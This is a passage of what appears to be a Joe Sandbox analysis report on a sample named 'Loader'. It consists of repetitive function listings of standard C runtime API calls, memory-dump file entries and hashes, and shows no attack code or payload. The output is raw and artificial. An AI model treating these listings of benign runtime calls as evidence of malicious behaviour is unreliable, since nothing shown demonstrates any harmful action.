                                                                                                    • Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00A81E2A
                                                                                                  • __dosmaperr.LIBCMT ref: 00A81E31
                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00A81E6B
                                                                                                  • __dosmaperr.LIBCMT ref: 00A81E72
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1913693674-0
                                                                                                  • Opcode ID: 2ec7f84db76742806daed54dec7e80947df9411042d6aa21287cb87291b60e41
                                                                                                  • Instruction ID: dd352559415253203dca709655dc7e4247e9334294009602ad57bb7e2663740e
                                                                                                  • Opcode Fuzzy Hash: 2ec7f84db76742806daed54dec7e80947df9411042d6aa21287cb87291b60e41
                                                                                                  • Instruction Fuzzy Hash: C8214971A04615AF9B20BFA58D8197BB7ADFF043A4B10C529FC5997251EB30EC52CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 62d61d0f55e0c1de9f99f0772b79116db0dd0b91c807170f4426d87b38da34ff
                                                                                                  • Instruction ID: 00bb091ea908a6fa78bf4402a64e1aca65b1330daf56ea27e254d175ef5f384a
                                                                                                  • Opcode Fuzzy Hash: 62d61d0f55e0c1de9f99f0772b79116db0dd0b91c807170f4426d87b38da34ff
                                                                                                  • Instruction Fuzzy Hash: FF21CD71204205AFDB22AFB5CD90A6E77A8FFA03A4B10C529F85D97250EB30EC50C7A0
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00A831C6
                                                                                                    • Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A831FE
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A8321E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 158306478-0
                                                                                                  • Opcode ID: b71d1a17b75f7d43204bf5d5b2ce3fb6deffd3288ff8f5c4888f78888a29d0dc
                                                                                                  • Instruction ID: ec1fd254cad5b85a14ca9e709afa38019965317abf40ac1e68b9277712781818
                                                                                                  • Opcode Fuzzy Hash: b71d1a17b75f7d43204bf5d5b2ce3fb6deffd3288ff8f5c4888f78888a29d0dc
                                                                                                  • Instruction Fuzzy Hash: B711D2F2A025197EAB2137B69D8ADFF6A6CDEA5B947108025FA05D1100FF64DF0182B1
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 00A6E899
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A6E8A3
                                                                                                  • int.LIBCPMT ref: 00A6E8BA
                                                                                                    • Part of subcall function 00A6C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00A6C1F6
                                                                                                    • Part of subcall function 00A6C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00A6C210
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A6E914
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                  • String ID:
                                                                                                  • API String ID: 1383202999-0
                                                                                                  • Opcode ID: eac22b5fe8e8e63d99b39b6309b85145b99bb2603a2f3c6ad8da17ff56e51bc3
                                                                                                  • Instruction ID: eb02c8ed2b923fd73248b20435ec8ca557fe320b61752efea3f610d6c79af024
                                                                                                  • Opcode Fuzzy Hash: eac22b5fe8e8e63d99b39b6309b85145b99bb2603a2f3c6ad8da17ff56e51bc3
                                                                                                  • Instruction Fuzzy Hash: FF11C036A001199FCF05EBB4DA55ABDBBB1AF94724F250119F411AB2D2CF749E01CF91
                                                                                                  APIs
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000), ref: 00A8ADB7
                                                                                                  • GetLastError.KERNEL32(?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?,?,?,00A83CD6,00000000), ref: 00A8ADC3
                                                                                                    • Part of subcall function 00A8AE20: CloseHandle.KERNEL32(FFFFFFFE,00A8ADD3,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?,?), ref: 00A8AE30
                                                                                                  • ___initconout.LIBCMT ref: 00A8ADD3
                                                                                                    • Part of subcall function 00A8ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A8AD91,00A8A2DC,?,?,00A84390,?,00000000,00000000,?), ref: 00A8AE08
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?), ref: 00A8ADE8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                  • String ID:
                                                                                                  • API String ID: 2744216297-0
                                                                                                  • Opcode ID: 50db343071c7fc3c48a0a066a4e5ade8fa50e5af813dafb6a49baa4af7468404
                                                                                                  • Instruction ID: d94a48af51fb2dcc5e2f3c9d4955b1ddf7624fe5f50f9c613b67ffc49b3fc1e6
                                                                                                  • Opcode Fuzzy Hash: 50db343071c7fc3c48a0a066a4e5ade8fa50e5af813dafb6a49baa4af7468404
                                                                                                  • Instruction Fuzzy Hash: 6BF0A536604529BBDF226FD5DC08A9A7F66FF587B2B044013FA1996120DB328861AB91
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00A70507
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A70516
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00A7051F
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00A7052C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 5f9371ace77956c688fff65c05458b9a6b9de34c1106a434ea9f81869c924124
                                                                                                  • Instruction ID: 8469ece2d0871438aa6edb57d630cdbd0dadf4673bc1d9f1ba49452bfe42fd1f
                                                                                                  • Opcode Fuzzy Hash: 5f9371ace77956c688fff65c05458b9a6b9de34c1106a434ea9f81869c924124
                                                                                                  • Instruction Fuzzy Hash: 38F05F74E1020DEBCB00DBF5DA4999EBBF4FF1C200B914996A412E6110EA30AA45DB50
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
                                                                                                    • Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210
                                                                                                  • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00A75BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00A80A35
                                                                                                  • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00A75BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00A80A6C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CodePageValid
                                                                                                  • String ID: utf8
                                                                                                  • API String ID: 943130320-905460609
                                                                                                  • Opcode ID: f6ab14052957443b8d1c048afe1f7c5a0d9109f6b96be0ba457798bc9c149e71
                                                                                                  • Instruction ID: c5c65cec8a08501ec86d1d760e3931a4b1265349abe8ce7d1aaf1c95ba1446d4
                                                                                                  • Opcode Fuzzy Hash: f6ab14052957443b8d1c048afe1f7c5a0d9109f6b96be0ba457798bc9c149e71
                                                                                                  • Instruction Fuzzy Hash: D4513771B00705AADB69BB74CD86FBBB3A8EF05744F044429F55A97082FB70ED4887A1
                                                                                                  APIs
                                                                                                  • Concurrency::details::_Release_chore.LIBCPMT ref: 00A67526
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A67561
                                                                                                    • Part of subcall function 00A6AF37: CreateThreadpoolWork.KERNEL32(00A6B060,00A68A2A,00000000), ref: 00A6AF46
                                                                                                    • Part of subcall function 00A6AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00A6AF53
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                  • String ID: Fail to schedule the chore!
                                                                                                  • API String ID: 3683891980-3313369819
                                                                                                  • Opcode ID: 4b6f0d90a63ce413cf334eff86d954b3b3823bb5c5b2eb7b44f662f556c7af92
                                                                                                  • Instruction ID: 02a0198b4016e901bf496ac898986edc6286690ee001938c909b39217255fe68
                                                                                                  • Opcode Fuzzy Hash: 4b6f0d90a63ce413cf334eff86d954b3b3823bb5c5b2eb7b44f662f556c7af92
                                                                                                  • Instruction Fuzzy Hash: F9519EB4A10218DFCF00DF94D948BAEBBB1FF08324F144129E81AAB391DB75A905CF91
                                                                                                  APIs
                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00A7B893,?,?,00000000,00000000,00000000,?), ref: 00A7B9B7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                  • Opcode ID: dd0604ccf391bee861b871f041a5501f7ffa1a995ee832b041f47a0cfa3d27ae
                                                                                                  • Instruction ID: d88288f33cc8fd44ce8738fca6342a4bbaeeb11bfe704af8befc82f9ce09302a
                                                                                                  • Opcode Fuzzy Hash: dd0604ccf391bee861b871f041a5501f7ffa1a995ee832b041f47a0cfa3d27ae
                                                                                                  • Instruction Fuzzy Hash: F94148B2900209EFCF16DF98CD81AAEBBB5BF48340F18C199FA18A7211D3359950DB61
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A63EC6
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A64002
                                                                                                    • Part of subcall function 00A6ABC5: _Yarn.LIBCPMT ref: 00A6ABE5
                                                                                                    • Part of subcall function 00A6ABC5: _Yarn.LIBCPMT ref: 00A6AC09
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                  • String ID: bad locale name
                                                                                                  • API String ID: 2070049627-1405518554
                                                                                                  • Opcode ID: ab5ddf7109b9ef93f5d174c74918f65274bcf74507114aa878fbc7a3e097f2c4
                                                                                                  • Instruction ID: 2b77fc916c62b8e3ff9a9f8a59e32dc08e450454c8de153ef27cc4d4fbca1c6d
                                                                                                  • Opcode Fuzzy Hash: ab5ddf7109b9ef93f5d174c74918f65274bcf74507114aa878fbc7a3e097f2c4
                                                                                                  • Instruction Fuzzy Hash: 9E418FF1A007459BEB10EF69C905B57BBF8BF04714F044629E4099B781E77AE518CBE1
                                                                                                  APIs
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00A7B475
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___except_validate_context_record
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                  • Opcode ID: 5f0a08c4774a36a94d3d5a9ca38ba0f370210d721d3d5bfa6b8ce0b8818a8d0f
                                                                                                  • Instruction ID: 5270dfc370027a0edac5da0e28ae1d9c1221e64e692c9fed6932fee5d586a612
                                                                                                  • Opcode Fuzzy Hash: 5f0a08c4774a36a94d3d5a9ca38ba0f370210d721d3d5bfa6b8ce0b8818a8d0f
                                                                                                  • Instruction Fuzzy Hash: 4F3107F2420219EBCF228F51CC44AAA7B76FF08718B18C65AF84D49122C332DD61DBA1
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A6B8B9
                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?), ref: 00A6B8DE
                                                                                                    • Part of subcall function 00A7060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00A6F354,02CB2C48,?,?,?,00A6F354,00A63D4A,00A9759C,00A63D4A), ref: 00A7066D
                                                                                                    • Part of subcall function 00A78353: IsProcessorFeaturePresent.KERNEL32(00000017,00A7C224), ref: 00A7836F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1924019822-1018135373
                                                                                                  • Opcode ID: 863063ec7073d498657baa21a257700f873578e77445315763a59468ae39b794
                                                                                                  • Instruction ID: a0c841d329b6cf57befff0513035183101fbeae13c8d1e6c2652ffeb3931e870
                                                                                                  • Opcode Fuzzy Hash: 863063ec7073d498657baa21a257700f873578e77445315763a59468ae39b794
                                                                                                  • Instruction Fuzzy Hash: 1E21AC31E10218EBCF34EF99D945AEEB7BCAF40710F144419E506EB250CB70AD85CBA1
                                                                                                  APIs
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A62673
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___std_exception_copy
                                                                                                  • String ID: bad array new length$ios_base::badbit set
                                                                                                  • API String ID: 2659868963-1158432155
                                                                                                  • Opcode ID: fb0abaa3755de8262d070ff83939471e215ffc181877965643ff10f27c5e9d7e
                                                                                                  • Instruction ID: eb1d3eddb6a26f4e1fdb884c3f7256f063db4edbc3dc734d24ca8c7d07bd4f22
                                                                                                  • Opcode Fuzzy Hash: fb0abaa3755de8262d070ff83939471e215ffc181877965643ff10f27c5e9d7e
                                                                                                  • Instruction Fuzzy Hash: E601BCB1614300ABDB04EF28D856A1A7BF4AF08318F01882DF45D9B341E775E804CB91
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00A6F354,02CB2C48,?,?,?,00A6F354,00A63D4A,00A9759C,00A63D4A), ref: 00A7066D
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A62673
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
